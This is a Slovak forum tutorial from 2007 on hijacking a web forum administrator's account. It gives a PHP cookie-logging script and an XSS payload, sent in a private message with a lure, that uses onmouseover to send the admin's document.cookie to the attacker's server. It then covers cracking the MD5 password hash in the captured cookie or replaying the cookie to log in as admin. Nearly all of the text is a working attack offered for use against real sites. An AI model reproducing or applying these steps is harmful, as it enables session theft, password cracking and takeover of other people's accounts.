Autor: Neo13 | 9.1.2007 |
Na zaciatok budeme potrebovat:
Firefox (http://www.getfirefox.com)
Live HTTP Headers (http://livehttpheaders.mozdev.org/) - pre firefox
Nejaky free server s PHP (http://wz.cz)
1 - Urobime si subor v notepade
A vlozime donho tento kod, ktory nam zaruci, ze sa nam cookie ulozi:
< ?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('pwnt.txt', 'a'); //chmod 777
lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
? >
Ulozime ho ako lol.php (alebo kao hocico .php) a uploadneme na nas free server.
2 - Najdeme si forum, ktore chceme hacknut (ak vidite, ze html je vypnute (ako na obrazku), radsej na to zabudnite, alebo rozmyslajte ako inak presvedcit admina aby siel na odkaz...)
http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)
3 - Toto je kod, ktory poslete adminovi ako sukromnu spravu, dopiste tam aj nieco co ho zaujme :)
< pre a='>' onmouseover='document.location="http://tvojadomena.wz.cz/lol.php?c="+document.cookie' b=' http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg
Zmen tvojadomena na nazov tvojej domeny. Zmen obrazok na co len chcex,alebo ho vymaz. Zmen lol.php na nazor suboru, ktory sme vytvorili v kroku 1.
Ked admin prejde mysou na link presmeruje ho to na tvoj php subor a ukaze mu prazdnu obrazovku, Mozme to zmneit, elbo takto to nevyzera moc nenapadne.
4 - Teraz najdi admina fora, ktore chces hacknut a posli mu kod z bodu 3. Pockas kym si spravu pozrie (1 den,mozno viac).
5 - Ked prejde mysou na odkaz vytvori sa nam subor lol.txt (aj to sa da zmenit v bode 1), otvor ho.
Uvidis asi takyto kod:
Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991
A - Najlahsie je skopirovat hash MD5 hesla ako tento: (bude zrejme iny, je to cookie...)
3921c75b299268bd87f48ec8c289c3f0
Skopiruj tento hash a chod na md5.rednoize.com alebo na iny cracker a vlep to tam, ak sa nic neukaze, budes musiet pouzit http headers (v priklade B) na zalogovanie sa ako admin.
B - Chod na forum, ktore si hackol, klikni na tools(Nástroje)(vo firefoxe) -> live http headers (dufam, ze uz mas firefox a http headers nainstalovane)
Teraz obnov stranku, na vrchu http headers obrazovky a uvidis nieco ako toto:
http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)
Klikni na obnovit(refresh)
Vymaz cely kod, ktory prisiel potom
cookie:
Vymen za kod, ktory sme dostali z bodu 5.
Zasa obnov stranku a si prihlaseny ako admin!
Ak to nepodje na prvykrat, pohraj sa s headers, malo by sa to podarit.
Original najdete tu:
http://www.elitehackers.info/forums/showthread.php?t=2782
Dufam, ze ma neukamenujete, Neo13.